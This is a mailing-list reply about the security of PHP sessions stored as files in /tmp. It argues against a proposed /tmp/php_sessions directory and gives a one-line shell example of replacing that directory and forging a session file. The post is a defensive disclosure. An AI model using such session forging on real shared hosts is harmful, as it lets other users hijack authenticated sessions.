I reported this to bugs.php.net over a year ago (bug #8189) and more recently I wrote an article for a PHP website about the use of PHP sessions for authentication, although that article has not yet been published. > Since PHP4 there is a native support for sessions, > which was derived > from the PHPLib. But instead of using a SQL backend > to store these > IDs, they chose to store them as files in /tmp. You can configure PHP to store sessions in an SQL database with session_set_save_handler. That will add to the complexity of your configuration, but will probably not make it any more secure. (How secure is your SQL backend?) > I suggest to create a directory called > > mkdir /tmp/php_sessions/ You're still in the /tmp directory, so there's still a potential for misuse. I could do "mv php_sessions php_sessions_old; mkdir php_sessions; echo 'juicy session data here' > php_sessions/sess_g35g5g54gg45wg85" and create my own sessions, assuming I know what data needs to be in the session file. This may protect you from casual shell users, but what about malicious PHP scripts, or other sites in a virtual hosting environment? __________________________________________________ Do You Yahoo!? Send FREE video emails in Yahoo! Mail! http://promo.yahoo.com/videomail/
